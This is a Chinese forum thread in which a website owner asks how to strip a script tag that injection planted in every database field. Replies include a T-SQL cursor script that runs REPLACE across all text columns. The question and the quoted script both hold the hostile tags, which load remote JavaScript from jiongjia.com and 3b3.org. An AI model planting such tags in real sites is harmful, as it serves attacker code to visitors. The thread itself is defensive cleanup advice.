求一条sql语句,网站被注入脚本了
网站所有的表中所有的数据中都加入了<script src=http://jiongjia.com/c.js></script>
怎么写sql语句。把这些去掉。有人建议用超级巡警
不知道有什么好办法、。
--------------------编程问答-------------------- http://blog.csdn.net/ZBzibing/archive/2009/05/08/4160903.aspx
这个里面的。怎么用啊? --------------------编程问答-------------------- 简单的就是做update --------------------编程问答-------------------- 怎么能批量修改啊 --------------------编程问答-------------------- 用delete语句不知道可不可以。 --------------------编程问答--------------------
汗了 要么insert 要么 update
delete。。。???? --------------------编程问答-------------------- 修改下面加粗的部分,在企业管理器中执行就行了
转:
如何最快速度删除?
" <script src=http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步:先sql表修改所有者为dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ''? '', ''dbo '' '
第二步:统一删除字段被挂的js
declare @delStr nvarchar(500)
set @delStr= '<script src=http://3b3.org/c.js> </script>'
set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [' + @tableName + '] set ['+ @columnName + ']= replace(['+@columnName+ '],'''+@delStr+ ''', '''') where ['+@columnName+ '] like ''%'+@delStr+ '%'''
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
end
fetch next from cur1 into @columnName
end
close cur1
deallocate cur1
fetch next from cur into @tableName,@tbID
end
print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '
close cur
deallocate cur
set nocount off --------------------编程问答-------------------- --------------------编程问答-------------------- 进去看看这个,应该对你有帮助
http://topic.csdn.net/u/20090326/11/5e584897-2dd7-4e10-af1b-9b48b146af8e.html?54704 --------------------编程问答-------------------- 谢了,我试试 --------------------编程问答-------------------- 网站要是被注入的话,在获取值的时候最好都进行过滤。 --------------------编程问答-------------------- update 表 set 列名='' where id in('id1','id2','id3','..','..');
补充:.NET技术 , ASP.NET